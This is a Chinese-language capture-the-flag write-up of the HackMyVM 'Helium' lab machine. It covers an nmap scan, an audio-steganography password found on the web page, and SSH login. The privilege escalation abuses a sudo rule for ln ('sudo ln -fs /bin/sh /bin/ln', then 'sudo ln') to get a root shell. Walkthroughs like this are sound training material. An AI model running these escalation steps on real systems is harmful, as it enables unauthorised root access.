hmv.Helium

信息搜集

主机扫描

arp-scan -l

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -sC -A 192.168.1.61 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-08 02:42 EDT
Nmap scan report for 192.168.1.61
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:f6:55:5f:c6:fa:fb:14:15:ae:4a:2b:38:d8:4a:30 (RSA)
|   256 b7:ac:87:6d:c4:f9:e3:9a:d4:6e:e0:4f:da:aa:22:20 (ECDSA)
|_  256 fe:e8:05:af:23:4d:3a:82:2a:64:9b:f7:35:e4:44:4a (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: RELAX
MAC Address: 08:00:27:DC:45:09 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.1.61

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.61 seconds

80 端口

查看网站有一段音频和图片,猜测隐写,查看源代码

我们从中发现存在一个用户和一个路径,路径访问了,什么也没有,结果在css文件中,发现一个路径,藏有音频路径

下载,利用工具发现存在音频隐写了密码

password:dancingpassyo

获取shell

拿到了用户名,拿到了密码,直接登录

提权

直接上步骤

  1. sudo -l,很幸运,直接发现利用命令
paul@helium:/home$ sudo -l
Matching Defaults entries for paul on helium:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paul may run the following commands on helium:
    (ALL : ALL) NOPASSWD: /usr/bin/ln

利用在 | go away垃圾箱 (gtfobins.github.io),提权

paul@helium:/home$ sudo ln -fs /bin/sh /bin/ln
paul@helium:/home$ sudo ln

知识点

  1. 音频隐写

发表评论

您的邮箱地址不会被公开。 必填项已用 * 标注

退出移动版